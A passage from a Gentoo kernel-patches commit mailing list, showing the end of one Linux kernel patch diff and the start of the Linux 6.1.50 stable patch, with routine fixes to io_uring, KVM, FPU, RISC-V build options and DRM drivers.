+ 			return ret;
+ 
+ 		tb_port_tmu_time_sync_disable(up);
+diff --git a/include/linux/moduleloader.h b/include/linux/moduleloader.h
+index 9e09d11ffe5b3..1322652a9d0d9 100644
+--- a/include/linux/moduleloader.h
++++ b/include/linux/moduleloader.h
+@@ -39,6 +39,11 @@ bool module_init_section(const char *name);
+  */
+ bool module_exit_section(const char *name);
+ 
++/* Describes whether within_module_init() will consider this an init section
++ * or not. This behaviour changes with CONFIG_MODULE_UNLOAD.
++ */
++bool module_init_layout_section(const char *sname);
++
+ /*
+  * Apply the given relocation to the (simplified) ELF.  Return -error
+  * or 0.
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index ed8e9deae284a..b0e47fe1eb4bb 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -72,6 +72,7 @@
+ #include <linux/io_uring.h>
+ #include <linux/audit.h>
+ #include <linux/security.h>
++#include <asm/shmparam.h>
+ 
+ #define CREATE_TRACE_POINTS
+ #include <trace/events/io_uring.h>
+@@ -3110,6 +3111,49 @@ static __cold int io_uring_mmap(struct file *file, struct vm_area_struct *vma)
+ 	return remap_pfn_range(vma, vma->vm_start, pfn, sz, vma->vm_page_prot);
+ }
+ 
++static unsigned long io_uring_mmu_get_unmapped_area(struct file *filp,
++			unsigned long addr, unsigned long len,
++			unsigned long pgoff, unsigned long flags)
++{
++	void *ptr;
++
++	/*
++	 * Do not allow to map to user-provided address to avoid breaking the
++	 * aliasing rules. Userspace is not able to guess the offset address of
++	 * kernel kmalloc()ed memory area.
++	 */
++	if (addr)
++		return -EINVAL;
++
++	ptr = io_uring_validate_mmap_request(filp, pgoff, len);
++	if (IS_ERR(ptr))
++		return -ENOMEM;
++
++	/*
++	 * Some architectures have strong cache aliasing requirements.
++	 * For such architectures we need a coherent mapping which aliases
++	 * kernel memory *and* userspace memory. To achieve that:
++	 * - use a NULL file pointer to reference physical memory, and
++	 * - use the kernel virtual address of the shared io_uring context
++	 *   (instead of the userspace-provided address, which has to be 0UL
++	 *   anyway).
++	 * - use the same pgoff which the get_unmapped_area() uses to
++	 *   calculate the page colouring.
++	 * For architectures without such aliasing requirements, the
++	 * architecture will return any suitable mapping because addr is 0.
++	 */
++	filp = NULL;
++	flags |= MAP_SHARED;
++	pgoff = 0;	/* has been translated to ptr above */
++#ifdef SHM_COLOUR
++	addr = (uintptr_t) ptr;
++	pgoff = addr >> PAGE_SHIFT;
++#else
++	addr = 0UL;
++#endif
++	return current->mm->get_unmapped_area(filp, addr, len, pgoff, flags);
++}
++
+ #else /* !CONFIG_MMU */
+ 
+ static int io_uring_mmap(struct file *file, struct vm_area_struct *vma)
+@@ -3324,6 +3368,8 @@ static const struct file_operations io_uring_fops = {
+ #ifndef CONFIG_MMU
+ 	.get_unmapped_area = io_uring_nommu_get_unmapped_area,
+ 	.mmap_capabilities = io_uring_nommu_mmap_capabilities,
++#else
++	.get_unmapped_area = io_uring_mmu_get_unmapped_area,
+ #endif
+ 	.poll		= io_uring_poll,
+ #ifdef CONFIG_PROC_FS
+diff --git a/kernel/kallsyms.c b/kernel/kallsyms.c
+index 676328a7c8c75..ad3cccb0970f8 100644
+--- a/kernel/kallsyms.c
++++ b/kernel/kallsyms.c
+@@ -188,16 +188,13 @@ static bool cleanup_symbol_name(char *s)
+ 
+ static int compare_symbol_name(const char *name, char *namebuf)
+ {
+-	int ret;
+-
+-	ret = strcmp(name, namebuf);
+-	if (!ret)
+-		return ret;
+-
+-	if (cleanup_symbol_name(namebuf) && !strcmp(name, namebuf))
+-		return 0;
+-
+-	return ret;
++	/* The kallsyms_seqs_of_names is sorted based on names after
++	 * cleanup_symbol_name() (see scripts/kallsyms.c) if clang lto is enabled.
++	 * To ensure correct bisection in kallsyms_lookup_names(), do
++	 * cleanup_symbol_name(namebuf) before comparing name and namebuf.
++	 */
++	cleanup_symbol_name(namebuf);
++	return strcmp(name, namebuf);
+ }
+ 
+ static int kallsyms_lookup_names(const char *name,
+diff --git a/kernel/locking/lockdep.c b/kernel/locking/lockdep.c
+index 50d4863974e7a..0224b0329d011 100644
+--- a/kernel/locking/lockdep.c
++++ b/kernel/locking/lockdep.c
+@@ -817,34 +817,26 @@ static int very_verbose(struct lock_class *class)
+  * Is this the address of a static object:
+  */
+ #ifdef __KERNEL__
+-/*
+- * Check if an address is part of freed initmem. After initmem is freed,
+- * memory can be allocated from it, and such allocations would then have
+- * addresses within the range [_stext, _end].
+- */
+-#ifndef arch_is_kernel_initmem_freed
+-static int arch_is_kernel_initmem_freed(unsigned long addr)
+-{
+-	if (system_state < SYSTEM_FREEING_INITMEM)
+-		return 0;
+-
+-	return init_section_contains((void *)addr, 1);
+-}
+-#endif
+-
+ static int static_obj(const void *obj)
+ {
+-	unsigned long start = (unsigned long) &_stext,
+-		      end   = (unsigned long) &_end,
+-		      addr  = (unsigned long) obj;
++	unsigned long addr = (unsigned long) obj;
+ 
+-	if (arch_is_kernel_initmem_freed(addr))
+-		return 0;
++	if (is_kernel_core_data(addr))
++		return 1;
++
++	/*
++	 * keys are allowed in the __ro_after_init section.
++	 */
++	if (is_kernel_rodata(addr))
++		return 1;
+ 
+ 	/*
+-	 * static variable?
++	 * in initdata section and used during bootup only?
++	 * NOTE: On some platforms the initdata section is
++	 * outside of the _stext ... _end range.
+ 	 */
+-	if ((addr >= start) && (addr < end))
++	if (system_state < SYSTEM_FREEING_INITMEM &&
++		init_section_contains((void *)addr, 1))
+ 		return 1;
+ 
+ 	/*
+diff --git a/kernel/module/main.c b/kernel/module/main.c
+index 7a627345d4fd9..7a6f43d2b7757 100644
+--- a/kernel/module/main.c
++++ b/kernel/module/main.c
+@@ -1401,7 +1401,7 @@ long module_get_offset(struct module *mod, unsigned int *size,
+ 	return ret;
+ }
+ 
+-static bool module_init_layout_section(const char *sname)
++bool module_init_layout_section(const char *sname)
+ {
+ #ifndef CONFIG_MODULE_UNLOAD
+ 	if (module_exit_section(sname))


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-08-30 14:42 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-08-30 14:42 UTC (permalink / raw
  To: gentoo-commits

commit:     bcbc0e39da9f3b81b92bc26417a3a3ebf0395db5
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Aug 30 14:42:12 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Aug 30 14:42:12 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=bcbc0e39

Linux patch 6.1.50

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1049_linux-6.1.50.patch | 31691 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 31695 insertions(+)

diff --git a/0000_README b/0000_README
index 6ce2c13b..870654fc 100644
--- a/0000_README
+++ b/0000_README
@@ -239,6 +239,10 @@ Patch:  1048_linux-6.1.49.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.49
 
+Patch:  1049_linux-6.1.50.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.50
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1049_linux-6.1.50.patch b/1049_linux-6.1.50.patch
new file mode 100644
index 00000000..4a052c91
--- /dev/null
+++ b/1049_linux-6.1.50.patch
@@ -0,0 +1,31691 @@
+diff --git a/MAINTAINERS b/MAINTAINERS
+index 379387e20a96d..07a9c274c0e29 100644
+--- a/MAINTAINERS
++++ b/MAINTAINERS
+@@ -6027,7 +6027,7 @@ S:	Supported
+ F:	Documentation/networking/devlink
+ F:	include/net/devlink.h
+ F:	include/uapi/linux/devlink.h
+-F:	net/core/devlink.c
++F:	net/devlink/
+ 
+ DH ELECTRONICS IMX6 DHCOM BOARD SUPPORT
+ M:	Christoph Niedermaier <cniedermaier@dh-electronics.com>
+diff --git a/Makefile b/Makefile
+index 61ebd54aba899..e5e1fdeef8bf0 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 49
++SUBLEVEL = 50
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/mips/include/asm/cpu-features.h b/arch/mips/include/asm/cpu-features.h
+index c0983130a44c9..e0a4da4cfd8bc 100644
+--- a/arch/mips/include/asm/cpu-features.h
++++ b/arch/mips/include/asm/cpu-features.h
+@@ -121,7 +121,24 @@
+ #define cpu_has_4k_cache	__isa_ge_or_opt(1, MIPS_CPU_4K_CACHE)
+ #endif
+ #ifndef cpu_has_octeon_cache
+-#define cpu_has_octeon_cache	0
++#define cpu_has_octeon_cache						\
++({									\
++	int __res;							\
++									\
++	switch (boot_cpu_type()) {					\
++	case CPU_CAVIUM_OCTEON:						\
++	case CPU_CAVIUM_OCTEON_PLUS:					\
++	case CPU_CAVIUM_OCTEON2:					\
++	case CPU_CAVIUM_OCTEON3:					\
++		__res = 1;						\
++		break;							\
++									\
++	default:							\
++		__res = 0;						\
++	}								\
++									\
++	__res;								\
++})
+ #endif
+ /* Don't override `cpu_has_fpu' to 1 or the "nofpu" option won't work.  */
+ #ifndef cpu_has_fpu
+@@ -351,7 +368,7 @@
+ ({									\
+ 	int __res;							\
+ 									\
+-	switch (current_cpu_type()) {					\
++	switch (boot_cpu_type()) {					\
+ 	case CPU_M14KC:							\
+ 	case CPU_74K:							\
+ 	case CPU_1074K:							\
+diff --git a/arch/riscv/Kconfig b/arch/riscv/Kconfig
+index 6bf8dc0b8f935..d702359f8ab5e 100644
+--- a/arch/riscv/Kconfig
++++ b/arch/riscv/Kconfig
+@@ -447,24 +447,30 @@ config TOOLCHAIN_HAS_ZIHINTPAUSE
+ config TOOLCHAIN_NEEDS_EXPLICIT_ZICSR_ZIFENCEI
+ 	def_bool y
+ 	# https://sourceware.org/git/?p=binutils-gdb.git;a=commit;h=aed44286efa8ae8717a77d94b51ac3614e2ca6dc
+-	depends on AS_IS_GNU && AS_VERSION >= 23800
++	# https://gcc.gnu.org/git/?p=gcc.git;a=commit;h=98416dbb0a62579d4a7a4a76bab51b5b52fec2cd
++	depends on AS_IS_GNU && AS_VERSION >= 23600
+ 	help
+-	  Newer binutils versions default to ISA spec version 20191213 which
+-	  moves some instructions from the I extension to the Zicsr and Zifencei
+-	  extensions.
++	  Binutils-2.38 and GCC-12.1.0 bumped the default ISA spec to the newer
++	  20191213 version, which moves some instructions from the I extension to
++	  the Zicsr and Zifencei extensions. This requires explicitly specifying
++	  Zicsr and Zifencei when binutils >= 2.38 or GCC >= 12.1.0. Zicsr
++	  and Zifencei are supported in binutils from version 2.36 onwards.
++	  To make life easier, and avoid forcing toolchains that default to a
++	  newer ISA spec to version 2.2, relax the check to binutils >= 2.36.
++	  For clang < 17 or GCC < 11.3.0, for which this is not possible or need
++	  special treatment, this is dealt with in TOOLCHAIN_NEEDS_OLD_ISA_SPEC.
+ 
+ config TOOLCHAIN_NEEDS_OLD_ISA_SPEC
+ 	def_bool y
+ 	depends on TOOLCHAIN_NEEDS_EXPLICIT_ZICSR_ZIFENCEI
+ 	# https://github.com/llvm/llvm-project/commit/22e199e6afb1263c943c0c0d4498694e15bf8a16
+-	depends on CC_IS_CLANG && CLANG_VERSION < 170000
++	# https://gcc.gnu.org/git/?p=gcc.git;a=commit;h=d29f5d6ab513c52fd872f532c492e35ae9fd6671
++	depends on (CC_IS_CLANG && CLANG_VERSION < 170000) || (CC_IS_GCC && GCC_VERSION < 110300)
+ 	help
+-	  Certain versions of clang do not support zicsr and zifencei via -march
+-	  but newer versions of binutils require it for the reasons noted in the
+-	  help text of CONFIG_TOOLCHAIN_NEEDS_EXPLICIT_ZICSR_ZIFENCEI. This
+-	  option causes an older ISA spec compatible with these older versions
+-	  of clang to be passed to GAS, which has the same result as passing zicsr
+-	  and zifencei to -march.
++	  Certain versions of clang and GCC do not support zicsr and zifencei via
++	  -march. This option causes an older ISA spec compatible with these older
++	  versions of clang and GCC to be passed to GAS, which has the same result
++	  as passing zicsr and zifencei to -march.
+ 
+ config FPU
+ 	bool "FPU support"
+diff --git a/arch/riscv/kernel/compat_vdso/Makefile b/arch/riscv/kernel/compat_vdso/Makefile
+index 7f34f3c7c8827..737c0857b14cd 100644
+--- a/arch/riscv/kernel/compat_vdso/Makefile
++++ b/arch/riscv/kernel/compat_vdso/Makefile
+@@ -11,7 +11,13 @@ compat_vdso-syms += flush_icache
+ COMPAT_CC := $(CC)
+ COMPAT_LD := $(LD)
+ 
+-COMPAT_CC_FLAGS := -march=rv32g -mabi=ilp32
++# binutils 2.35 does not support the zifencei extension, but in the ISA
++# spec 20191213, G stands for IMAFD_ZICSR_ZIFENCEI.
++ifdef CONFIG_TOOLCHAIN_NEEDS_EXPLICIT_ZICSR_ZIFENCEI
++	COMPAT_CC_FLAGS := -march=rv32g -mabi=ilp32
++else
++	COMPAT_CC_FLAGS := -march=rv32imafd -mabi=ilp32
++endif
+ COMPAT_LD_FLAGS := -melf32lriscv
+ 
+ # Disable attributes, as they're useless and break the build.
+diff --git a/arch/x86/kernel/fpu/context.h b/arch/x86/kernel/fpu/context.h
+index 9fcfa5c4dad79..71b5059e092ab 100644
+--- a/arch/x86/kernel/fpu/context.h
++++ b/arch/x86/kernel/fpu/context.h
+@@ -19,8 +19,7 @@
+  * FPU state for a task MUST let the rest of the kernel know that the
+  * FPU registers are no longer valid for this task.
+  *
+- * Either one of these invalidation functions is enough. Invalidate
+- * a resource you control: CPU if using the CPU for something else
++ * Invalidate a resource you control: CPU if using the CPU for something else
+  * (with preemption disabled), FPU for the current task, or a task that
+  * is prevented from running by the current task.
+  */
+diff --git a/arch/x86/kernel/fpu/core.c b/arch/x86/kernel/fpu/core.c
+index caf33486dc5ee..a083f9ac9e4f6 100644
+--- a/arch/x86/kernel/fpu/core.c
++++ b/arch/x86/kernel/fpu/core.c
+@@ -679,7 +679,7 @@ static void fpu_reset_fpregs(void)
+ 	struct fpu *fpu = &current->thread.fpu;
+ 
+ 	fpregs_lock();
+-	fpu__drop(fpu);
++	__fpu_invalidate_fpregs_state(fpu);
+ 	/*
+ 	 * This does not change the actual hardware registers. It just
+ 	 * resets the memory image and sets TIF_NEED_FPU_LOAD so a
+diff --git a/arch/x86/kernel/fpu/xstate.c b/arch/x86/kernel/fpu/xstate.c
+index 0bab497c94369..1afbc4866b100 100644
+--- a/arch/x86/kernel/fpu/xstate.c
++++ b/arch/x86/kernel/fpu/xstate.c
+@@ -882,6 +882,13 @@ void __init fpu__init_system_xstate(unsigned int legacy_size)
+ 		goto out_disable;
+ 	}
+ 
++	/*
++	 * CPU capabilities initialization runs before FPU init. So
++	 * X86_FEATURE_OSXSAVE is not set. Now that XSAVE is completely
++	 * functional, set the feature bit so depending code works.
++	 */
++	setup_force_cpu_cap(X86_FEATURE_OSXSAVE);
++
+ 	print_xstate_offset_size();
+ 	pr_info("x86/fpu: Enabled xstate features 0x%llx, context size is %d bytes, using '%s' format.\n",
+ 		fpu_kernel_cfg.max_features,
+diff --git a/arch/x86/kvm/mmu/mmu.c b/arch/x86/kvm/mmu/mmu.c
+index 230108a90cf39..beca03556379d 100644
+--- a/arch/x86/kvm/mmu/mmu.c
++++ b/arch/x86/kvm/mmu/mmu.c
+@@ -4212,7 +4212,8 @@ static int kvm_faultin_pfn(struct kvm_vcpu *vcpu, struct kvm_page_fault *fault)
+  * root was invalidated by a memslot update or a relevant mmu_notifier fired.
+  */
+ static bool is_page_fault_stale(struct kvm_vcpu *vcpu,
+-				struct kvm_page_fault *fault, int mmu_seq)
++				struct kvm_page_fault *fault,
++				unsigned long mmu_seq)
+ {
+ 	struct kvm_mmu_page *sp = to_shadow_page(vcpu->arch.mmu->root.hpa);
+ 
+diff --git a/arch/x86/kvm/mmu/tdp_mmu.c b/arch/x86/kvm/mmu/tdp_mmu.c
+index 672f0432d7777..70945f00ec412 100644
+--- a/arch/x86/kvm/mmu/tdp_mmu.c
++++ b/arch/x86/kvm/mmu/tdp_mmu.c
+@@ -51,7 +51,17 @@ void kvm_mmu_uninit_tdp_mmu(struct kvm *kvm)
+ 	if (!kvm->arch.tdp_mmu_enabled)
+ 		return;
+ 
+-	/* Also waits for any queued work items.  */
++	/*
++	 * Invalidate all roots, which besides the obvious, schedules all roots
++	 * for zapping and thus puts the TDP MMU's reference to each root, i.e.
++	 * ultimately frees all roots.
++	 */
++	kvm_tdp_mmu_invalidate_all_roots(kvm);
++
++	/*
++	 * Destroying a workqueue also first flushes the workqueue, i.e. no
++	 * need to invoke kvm_tdp_mmu_zap_invalidated_roots().
++	 */
+ 	destroy_workqueue(kvm->arch.tdp_mmu_zap_wq);
+ 
+ 	WARN_ON(!list_empty(&kvm->arch.tdp_mmu_pages));
+@@ -127,16 +137,6 @@ static void tdp_mmu_schedule_zap_root(struct kvm *kvm, struct kvm_mmu_page *root
+ 	queue_work(kvm->arch.tdp_mmu_zap_wq, &root->tdp_mmu_async_work);
+ }
+ 
+-static inline bool kvm_tdp_root_mark_invalid(struct kvm_mmu_page *page)
+-{
+-	union kvm_mmu_page_role role = page->role;
+-	role.invalid = true;
+-
+-	/* No need to use cmpxchg, only the invalid bit can change.  */
+-	role.word = xchg(&page->role.word, role.word);
+-	return role.invalid;
+-}
+-
+ void kvm_tdp_mmu_put_root(struct kvm *kvm, struct kvm_mmu_page *root,
+ 			  bool shared)
+ {
+@@ -145,45 +145,12 @@ void kvm_tdp_mmu_put_root(struct kvm *kvm, struct kvm_mmu_page *root,
+ 	if (!refcount_dec_and_test(&root->tdp_mmu_root_count))
+ 		return;
+ 
+-	WARN_ON(!root->tdp_mmu_page);
+-
+ 	/*
+-	 * The root now has refcount=0.  It is valid, but readers already
+-	 * cannot acquire a reference to it because kvm_tdp_mmu_get_root()
+-	 * rejects it.  This remains true for the rest of the execution
+-	 * of this function, because readers visit valid roots only
+-	 * (except for tdp_mmu_zap_root_work(), which however
+-	 * does not acquire any reference itself).
+-	 *
+-	 * Even though there are flows that need to visit all roots for
+-	 * correctness, they all take mmu_lock for write, so they cannot yet
+-	 * run concurrently. The same is true after kvm_tdp_root_mark_invalid,
+-	 * since the root still has refcount=0.
+-	 *
+-	 * However, tdp_mmu_zap_root can yield, and writers do not expect to
+-	 * see refcount=0 (see for example kvm_tdp_mmu_invalidate_all_roots()).
+-	 * So the root temporarily gets an extra reference, going to refcount=1
+-	 * while staying invalid.  Readers still cannot acquire any reference;
+-	 * but writers are now allowed to run if tdp_mmu_zap_root yields and
+-	 * they might take an extra reference if they themselves yield.
+-	 * Therefore, when the reference is given back by the worker,
+-	 * there is no guarantee that the refcount is still 1.  If not, whoever
+-	 * puts the last reference will free the page, but they will not have to
+-	 * zap the root because a root cannot go from invalid to valid.
++	 * The TDP MMU itself holds a reference to each root until the root is
++	 * explicitly invalidated, i.e. the final reference should be never be
++	 * put for a valid root.
+ 	 */
+-	if (!kvm_tdp_root_mark_invalid(root)) {
+-		refcount_set(&root->tdp_mmu_root_count, 1);
+-
+-		/*
+-		 * Zapping the root in a worker is not just "nice to have";
+-		 * it is required because kvm_tdp_mmu_invalidate_all_roots()
+-		 * skips already-invalid roots.  If kvm_tdp_mmu_put_root() did
+-		 * not add the root to the workqueue, kvm_tdp_mmu_zap_all_fast()
+-		 * might return with some roots not zapped yet.
+-		 */
+-		tdp_mmu_schedule_zap_root(kvm, root);
+-		return;
+-	}
++	KVM_BUG_ON(!is_tdp_mmu_page(root) || !root->role.invalid, kvm);
+ 
+ 	spin_lock(&kvm->arch.tdp_mmu_pages_lock);
+ 	list_del_rcu(&root->link);
+@@ -329,7 +296,14 @@ hpa_t kvm_tdp_mmu_get_vcpu_root_hpa(struct kvm_vcpu *vcpu)
+ 	root = tdp_mmu_alloc_sp(vcpu);
+ 	tdp_mmu_init_sp(root, NULL, 0, role);
+ 
+-	refcount_set(&root->tdp_mmu_root_count, 1);
++	/*
++	 * TDP MMU roots are kept until they are explicitly invalidated, either
++	 * by a memslot update or by the destruction of the VM.  Initialize the
++	 * refcount to two; one reference for the vCPU, and one reference for
++	 * the TDP MMU itself, which is held until the root is invalidated and
++	 * is ultimately put by tdp_mmu_zap_root_work().
++	 */
++	refcount_set(&root->tdp_mmu_root_count, 2);
+ 
+ 	spin_lock(&kvm->arch.tdp_mmu_pages_lock);
+ 	list_add_rcu(&root->link, &kvm->arch.tdp_mmu_roots);
+@@ -1027,32 +1001,49 @@ void kvm_tdp_mmu_zap_invalidated_roots(struct kvm *kvm)
+ /*
+  * Mark each TDP MMU root as invalid to prevent vCPUs from reusing a root that
+  * is about to be zapped, e.g. in response to a memslots update.  The actual
+- * zapping is performed asynchronously, so a reference is taken on all roots.
+- * Using a separate workqueue makes it easy to ensure that the destruction is
+- * performed before the "fast zap" completes, without keeping a separate list
+- * of invalidated roots; the list is effectively the list of work items in
+- * the workqueue.
+- *
+- * Get a reference even if the root is already invalid, the asynchronous worker
+- * assumes it was gifted a reference to the root it processes.  Because mmu_lock
+- * is held for write, it should be impossible to observe a root with zero refcount,
+- * i.e. the list of roots cannot be stale.
++ * zapping is performed asynchronously.  Using a separate workqueue makes it
++ * easy to ensure that the destruction is performed before the "fast zap"
++ * completes, without keeping a separate list of invalidated roots; the list is
++ * effectively the list of work items in the workqueue.
+  *
+- * This has essentially the same effect for the TDP MMU
+- * as updating mmu_valid_gen does for the shadow MMU.
++ * Note, the asynchronous worker is gifted the TDP MMU's reference.
++ * See kvm_tdp_mmu_get_vcpu_root_hpa().
+  */
+ void kvm_tdp_mmu_invalidate_all_roots(struct kvm *kvm)
+ {
+ 	struct kvm_mmu_page *root;
+ 
+-	lockdep_assert_held_write(&kvm->mmu_lock);
+-	list_for_each_entry(root, &kvm->arch.tdp_mmu_roots, link) {
+-		if (!root->role.invalid &&
+-		    !WARN_ON_ONCE(!kvm_tdp_mmu_get_root(root))) {
++	/*
++	 * mmu_lock must be held for write to ensure that a root doesn't become
++	 * invalid while there are active readers (invalidating a root while
++	 * there are active readers may or may not be problematic in practice,
++	 * but it's uncharted territory and not supported).
++	 *
++	 * Waive the assertion if there are no users of @kvm, i.e. the VM is
++	 * being destroyed after all references have been put, or if no vCPUs
++	 * have been created (which means there are no roots), i.e. the VM is
++	 * being destroyed in an error path of KVM_CREATE_VM.
++	 */
++	if (IS_ENABLED(CONFIG_PROVE_LOCKING) &&
++	    refcount_read(&kvm->users_count) && kvm->created_vcpus)
++		lockdep_assert_held_write(&kvm->mmu_lock);
++
++	/*
++	 * As above, mmu_lock isn't held when destroying the VM!  There can't
++	 * be other references to @kvm, i.e. nothing else can invalidate roots
++	 * or be consuming roots, but walking the list of roots does need to be
++	 * guarded against roots being deleted by the asynchronous zap worker.
++	 */
++	rcu_read_lock();
++
++	list_for_each_entry_rcu(root, &kvm->arch.tdp_mmu_roots, link) {
++		if (!root->role.invalid) {
+ 			root->role.invalid = true;
+ 			tdp_mmu_schedule_zap_root(kvm, root);
+ 		}
+ 	}
++
++	rcu_read_unlock();
+ }
+ 
+ /*
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index 4459cfbdbcb18..c2f0f74193f0e 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -1223,9 +1223,6 @@ static int __ublk_ch_uring_cmd(struct io_uring_cmd *cmd,
+ 			__func__, cmd->cmd_op, ub_cmd->q_id, tag,
+ 			ub_cmd->result);
+ 
+-	if (!(issue_flags & IO_URING_F_SQE128))
+-		goto out;
+-
+ 	if (ub_cmd->q_id >= ub->dev_info.nr_hw_queues)
+ 		goto out;
+ 
+diff --git a/drivers/clk/clk-devres.c b/drivers/clk/clk-devres.c
+index 4fb4fd4b06bda..737aa70e2cb3d 100644
+--- a/drivers/clk/clk-devres.c
++++ b/drivers/clk/clk-devres.c
+@@ -205,18 +205,19 @@ EXPORT_SYMBOL(devm_clk_put);
+ struct clk *devm_get_clk_from_child(struct device *dev,
+ 				    struct device_node *np, const char *con_id)
+ {
+-	struct clk **ptr, *clk;
++	struct devm_clk_state *state;
++	struct clk *clk;
+ 
+-	ptr = devres_alloc(devm_clk_release, sizeof(*ptr), GFP_KERNEL);
+-	if (!ptr)
++	state = devres_alloc(devm_clk_release, sizeof(*state), GFP_KERNEL);
++	if (!state)
+ 		return ERR_PTR(-ENOMEM);
+ 
+ 	clk = of_clk_get_by_name(np, con_id);
+ 	if (!IS_ERR(clk)) {
+-		*ptr = clk;
+-		devres_add(dev, ptr);
++		state->clk = clk;
++		devres_add(dev, state);
+ 	} else {
+-		devres_free(ptr);
++		devres_free(state);
+ 	}
+ 
+ 	return clk;
+diff --git a/drivers/dma-buf/sw_sync.c b/drivers/dma-buf/sw_sync.c
+index 348b3a9170fa4..7f5ed1aa7a9f8 100644
+--- a/drivers/dma-buf/sw_sync.c
++++ b/drivers/dma-buf/sw_sync.c
+@@ -191,6 +191,7 @@ static const struct dma_fence_ops timeline_fence_ops = {
+  */
+ static void sync_timeline_signal(struct sync_timeline *obj, unsigned int inc)
+ {
++	LIST_HEAD(signalled);
+ 	struct sync_pt *pt, *next;
+ 
+ 	trace_sync_timeline(obj);
+@@ -203,21 +204,20 @@ static void sync_timeline_signal(struct sync_timeline *obj, unsigned int inc)
+ 		if (!timeline_fence_signaled(&pt->base))
+ 			break;
+ 
+-		list_del_init(&pt->link);
++		dma_fence_get(&pt->base);
++
++		list_move_tail(&pt->link, &signalled);
+ 		rb_erase(&pt->node, &obj->pt_tree);
+ 
+-		/*
+-		 * A signal callback may release the last reference to this
+-		 * fence, causing it to be freed. That operation has to be
+-		 * last to avoid a use after free inside this loop, and must
+-		 * be after we remove the fence from the timeline in order to
+-		 * prevent deadlocking on timeline->lock inside
+-		 * timeline_fence_release().
+-		 */
+ 		dma_fence_signal_locked(&pt->base);
+ 	}
+ 
+ 	spin_unlock_irq(&obj->lock);
++
++	list_for_each_entry_safe(pt, next, &signalled, link) {
++		list_del_init(&pt->link);
++		dma_fence_put(&pt->base);
++	}
+ }
+ 
+ /**
+diff --git a/drivers/gpio/gpio-sim.c b/drivers/gpio/gpio-sim.c
+index fef12e57b1f13..b352775e5e0b8 100644
+--- a/drivers/gpio/gpio-sim.c
++++ b/drivers/gpio/gpio-sim.c
+@@ -290,6 +290,15 @@ static void gpio_sim_mutex_destroy(void *data)
+ 	mutex_destroy(lock);
+ }
+ 
++static void gpio_sim_dispose_mappings(void *data)
++{
++	struct gpio_sim_chip *chip = data;
++	unsigned int i;
++
++	for (i = 0; i < chip->gc.ngpio; i++)
++		irq_dispose_mapping(irq_find_mapping(chip->irq_sim, i));
++}
++
+ static void gpio_sim_sysfs_remove(void *data)
+ {
+ 	struct gpio_sim_chip *chip = data;
+@@ -398,10 +407,14 @@ static int gpio_sim_add_bank(struct fwnode_handle *swnode, struct device *dev)
+ 	if (!chip->pull_map)
+ 		return -ENOMEM;
+ 
+-	chip->irq_sim = devm_irq_domain_create_sim(dev, NULL, num_lines);
++	chip->irq_sim = devm_irq_domain_create_sim(dev, swnode, num_lines);
+ 	if (IS_ERR(chip->irq_sim))
+ 		return PTR_ERR(chip->irq_sim);
+ 
++	ret = devm_add_action_or_reset(dev, gpio_sim_dispose_mappings, chip);
++	if (ret)
++		return ret;
++
+ 	mutex_init(&chip->lock);
+ 	ret = devm_add_action_or_reset(dev, gpio_sim_mutex_destroy,
+ 				       &chip->lock);
+diff --git a/drivers/gpu/drm/arm/hdlcd_drv.c b/drivers/gpu/drm/arm/hdlcd_drv.c
+index a032003c340cc..d6ea47873627f 100644
+--- a/drivers/gpu/drm/arm/hdlcd_drv.c
++++ b/drivers/gpu/drm/arm/hdlcd_drv.c
+@@ -290,7 +290,7 @@ static int hdlcd_drm_bind(struct device *dev)
+ 	 */
+ 	if (hdlcd_read(hdlcd, HDLCD_REG_COMMAND)) {
+ 		hdlcd_write(hdlcd, HDLCD_REG_COMMAND, 0);
+-		drm_aperture_remove_framebuffers(false, &hdlcd_driver);
++		drm_aperture_remove_framebuffers(&hdlcd_driver);
+ 	}
+ 
+ 	drm_mode_config_reset(drm);
+diff --git a/drivers/gpu/drm/armada/armada_drv.c b/drivers/gpu/drm/armada/armada_drv.c
+index 142668cd6d7cd..688ba358f5319 100644
+--- a/drivers/gpu/drm/armada/armada_drv.c
++++ b/drivers/gpu/drm/armada/armada_drv.c
+@@ -95,7 +95,7 @@ static int armada_drm_bind(struct device *dev)
+ 	}
+ 
+ 	/* Remove early framebuffers */
+-	ret = drm_aperture_remove_framebuffers(false, &armada_drm_driver);
++	ret = drm_aperture_remove_framebuffers(&armada_drm_driver);
+ 	if (ret) {
+ 		dev_err(dev, "[" DRM_NAME ":%s] can't kick out simple-fb: %d\n",
+ 			__func__, ret);
+diff --git a/drivers/gpu/drm/ast/ast_drv.c b/drivers/gpu/drm/ast/ast_drv.c
+index b9392f31e6291..800471f2a2037 100644
+--- a/drivers/gpu/drm/ast/ast_drv.c
++++ b/drivers/gpu/drm/ast/ast_drv.c
+@@ -89,27 +89,13 @@ static const struct pci_device_id ast_pciidlist[] = {
+ 
+ MODULE_DEVICE_TABLE(pci, ast_pciidlist);
+ 
+-static int ast_remove_conflicting_framebuffers(struct pci_dev *pdev)
+-{
+-	bool primary = false;
+-	resource_size_t base, size;
+-
+-	base = pci_resource_start(pdev, 0);
+-	size = pci_resource_len(pdev, 0);
+-#ifdef CONFIG_X86
